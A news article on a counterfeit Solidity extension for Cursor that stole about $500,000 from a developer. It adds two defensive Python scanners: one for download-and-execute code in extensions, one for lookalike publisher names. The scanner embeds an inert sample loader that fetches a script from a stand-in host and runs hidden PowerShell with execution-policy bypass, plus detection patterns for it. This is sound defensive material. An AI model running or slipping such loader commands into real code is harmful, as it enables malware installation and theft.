A Russian blockchain developer lost approximately $500,000 in cryptocurrency after installing a malicious extension from the Open VSX marketplace, highlighting a concerning trend where cybercriminals target developers through compromised IDE extensions. This sophisticated attack demonstrates how threat actors exploit trusted development environments to access high-value cryptocurrency assets.
Anatomy of the Fake Solidity Extension Attack
Security researchers at Kaspersky Lab revealed that the victim’s operating system was installed just days before the incident occurred. Despite being well-versed in cryptocurrency security risks and maintaining strict installation practices for verified software only, the developer fell victim to this carefully orchestrated attack.
The attack vector centered on a malicious extension.js file embedded within a counterfeit Solidity Language extension designed for the Cursor AI development environment. The fraudulent extension had been published in the Open VSX repository approximately two months prior and accumulated 54,000 downloads before detection.
Exploiting Search Algorithm Vulnerabilities
The cybercriminals leveraged Open VSX’s ranking algorithm, which considers multiple factors including extension ratings, recency, download counts, and verification status. The malicious extension achieved 4th position in search results for “solidity” queries, while the legitimate extension ranked only 8th.
Rather than providing the advertised Solidity syntax highlighting functionality, the fake plugin downloaded and executed a malicious PowerShell script from the angelic[.]su server. The extension’s description was completely copied from the legitimate version to maintain credibility.
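A syntax-highlighting extension has no reason to spawn a shell, invoke PowerShell or fetch a remote script, so the download-and-execute behaviour described above is cheap to screen for statically. The scanner below is an added example written for this page, not code from Kaspersky or from the extensions involved; the two JavaScript samples it scans are constructed inline (the "suspicious" one is an inert string modelled on the described behaviour), and the default `~/.cursor/extensions` location is an assumption to adjust for your editor.

```python
import re
from pathlib import Path
from typing import Dict, List

# Constructed sample: a benign language extension's entry point.
BENIGN_EXTENSION_JS = """
const vscode = require('vscode');
function activate(context) {
  const disposable = vscode.languages.registerHoverProvider('solidity', {
    provideHover() { return new vscode.Hover('Solidity keyword'); }
  });
  context.subscriptions.push(disposable);
}
module.exports = { activate };
"""

# Constructed sample modelled on the behaviour the article describes
# (fetch a PowerShell script, then run it). Inert text used only as input.
SUSPICIOUS_EXTENSION_JS = """
const { exec } = require('child_process');
const https = require('https');
function activate() {
  https.get('https://example.invalid/stage1.ps1', res => { /* ... */ });
  exec('powershell -ExecutionPolicy Bypass -w hidden -File stage1.ps1');
}
module.exports = { activate };
"""

# Indicators of download-and-execute behaviour in an editor extension.
INDICATORS: Dict[str, re.Pattern] = {
    "spawns_process": re.compile(r"child_process|\bspawn(Sync)?\(|\bexec(Sync)?\("),
    "invokes_powershell": re.compile(r"powershell(\.exe)?", re.IGNORECASE),
    # Flags that suppress the window or execution policy, typical of loaders.
    "powershell_evasion_flags": re.compile(
        r"-(?:ExecutionPolicy\s+Bypass|w(?:indowStyle)?\s+hidden|EncodedCommand|enc)\b",
        re.IGNORECASE),
    "remote_fetch": re.compile(
        r"""require\(\s*['"](?:https?|net)['"]\s*\)|\bfetch\(|\.get\(\s*['"]https?://"""),
}


def scan_extension_source(source: str) -> List[str]:
    """Return the names of all indicators present in one JavaScript source."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(source)]


def risk_verdict(findings: List[str]) -> str:
    """Process spawning combined with PowerShell or a remote fetch is the loader pattern."""
    if "spawns_process" in findings and (
            "invokes_powershell" in findings or "remote_fetch" in findings):
        return "high"
    return "review" if findings else "clean"


def scan_extension_dir(root: Path) -> Dict[str, List[str]]:
    """Scan every .js file under an extensions tree; map path -> findings for files with hits."""
    results: Dict[str, List[str]] = {}
    for js in root.rglob("*.js"):
        if "node_modules" in js.parts:      # vendored libraries produce noise; review them separately
            continue
        try:
            source = js.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        findings = scan_extension_source(source)
        if findings:
            results[str(js)] = findings
    return results


if __name__ == "__main__":
    import sys
    for label, src in (("benign", BENIGN_EXTENSION_JS), ("suspicious", SUSPICIOUS_EXTENSION_JS)):
        found = scan_extension_source(src)
        print(f"{label}: {risk_verdict(found)} {found}")
    # Assumed default extension tree for Cursor; VS Code uses ~/.vscode/extensions.
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path.home() / ".cursor" / "extensions"
    if root.is_dir():
        for path, found in scan_extension_dir(root).items():
            print(f"{risk_verdict(found)}: {path} {found}")
```

Run it against an extensions directory to get a shortlist for manual review; a "high" verdict on an extension whose manifest promises only grammar files or a hover provider is the mismatch between advertised and actual behaviour that this incident turned on.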
Multi-Stage Cryptocurrency Theft Operation
Following the initial compromise, attackers deployed a weaponized ScreenConnect build enabling remote system access. The infection chain continued with the deployment of the open-source Quasar backdoor and a comprehensive data stealer targeting browsers, email clients, and cryptocurrency wallets.
The developer initially dismissed the absence of syntax highlighting as a typical extension malfunction, providing attackers with valuable time to establish persistence and execute their cryptocurrency theft operations.
Advanced Social Engineering Tactics
After the initial malicious package was removed on July 2, 2025, the attackers immediately published a new extension titled “solidity” – an exact match to the legitimate plugin name. They artificially inflated download counts to 2 million to enhance credibility.
The most sophisticated aspect involved username spoofing: the legitimate extension belonged to user “juanblanco” while the malicious version used “juanbIanco.” In Cursor AI’s font rendering, the lowercase “l” and uppercase “I” appear identical, making detection nearly impossible through casual inspection.
Protecting Development Environments from Supply Chain Attacks
Security experts emphasize that identifying compromised open-source packages is becoming increasingly challenging. Attackers employ sophisticated social engineering techniques and exploit ranking algorithm weaknesses to promote malicious content effectively.
Critical protection measures include rigorous extension authenticity verification, careful examination of developer names and publication dates, and implementation of isolated environments for cryptocurrency operations. Organizations should establish strict policies for extension installations and maintain updated threat intelligence on emerging attack vectors.
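The "juanblanco" versus "juanbIanco" spoofing described earlier and the verification steps listed here (check the publisher name, the publication date and the plausibility of the download count against an allowlist) can be encoded as one audit routine. The code below is an added example for this page, not tooling from Kaspersky, Open VSX or Cursor: the allowlist, the confusable-character groups, the 30-day and 100,000-download thresholds, and the registry records it audits are all constructed assumptions to replace with your own data.

```python
from datetime import date
from typing import Dict, List, Set, Tuple

# ASCII characters that render alike in many monospace editor fonts; each group
# collapses to its first member. The l/I pair is the one used in this incident.
_CONFUSABLE_GROUPS = ("lI1|", "O0", "S5", "Z2", "B8")
_CANON = {c: group[0].lower() for group in _CONFUSABLE_GROUPS for c in group}


def skeleton(name: str) -> str:
    """Canonical form of a publisher or extension name for lookalike comparison."""
    s = name.strip().replace("rn", "m")        # 'rn' reads as 'm' in narrow fonts
    return "".join(_CANON.get(c, c.lower()) for c in s)


# Constructed allowlist: (publisher, name) pairs the team has vetted by hand.
TRUSTED_EXTENSIONS: Set[Tuple[str, str]] = {("juanblanco", "solidity")}

# Constructed registry metadata for the example; not real Open VSX records.
SAMPLE_REGISTRY_ENTRIES = [
    {"publisher": "juanblanco", "name": "solidity", "published": date(2020, 1, 1), "downloads": 1_500_000},
    {"publisher": "juanbIanco", "name": "solidity", "published": date(2025, 7, 2), "downloads": 2_000_000},
    {"publisher": "someone-else", "name": "solidity", "published": date(2024, 3, 15), "downloads": 1_200},
]
AUDIT_DATE = date(2025, 7, 10)   # constructed "today" for the sample run


def audit_extension(entry: Dict, today: date,
                    trusted: Set[Tuple[str, str]] = TRUSTED_EXTENSIONS,
                    recent_days: int = 30, bulk_downloads: int = 100_000) -> Tuple[str, List[str]]:
    """Return (verdict, findings). Exact allowlist hits are allowed; lookalikes are blocked;
    anything else goes to manual review with the reasons attached."""
    publisher, name = entry["publisher"], entry["name"]
    if (publisher, name) in trusted:
        return "allow", []
    findings: List[str] = []
    for t_pub, t_name in trusted:
        if skeleton(name) != skeleton(t_name):
            continue
        if skeleton(publisher) == skeleton(t_pub):
            findings.append(f"publisher '{publisher}' is a visual lookalike of trusted '{t_pub}'")
        else:
            findings.append(f"name collides with trusted '{t_pub}.{t_name}' under a different publisher")
    age_days = (today - entry["published"]).days
    if age_days < recent_days:
        findings.append(f"published only {age_days} days ago")
        if entry["downloads"] >= bulk_downloads:
            findings.append(f"{entry['downloads']:,} downloads in {age_days} days is implausible; "
                            "count may be inflated")
    verdict = "block" if any("lookalike" in f for f in findings) else "review"
    return verdict, findings


if __name__ == "__main__":
    for entry in SAMPLE_REGISTRY_ENTRIES:
        verdict, findings = audit_extension(entry, AUDIT_DATE)
        print(f"{verdict:6} {entry['publisher']}.{entry['name']}")
        for f in findings:
            print(f"       - {f}")
```

For installed extensions the `publisher` and `name` fields come from each extension's package.json; publication date and download count have to be taken from the marketplace listing, since nothing on disk records them. Comparing skeletons rather than raw strings is the point: a rendering-level lookalike is invisible to an exact-match allowlist but trivial for the normalised comparison.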
This incident underscores the evolving threat landscape facing blockchain developers and the critical importance of comprehensive security strategies. Even experienced professionals can fall victim to sophisticated attacks, emphasizing the need for continuous security awareness training and robust protective measures when working with external development tools and extensions.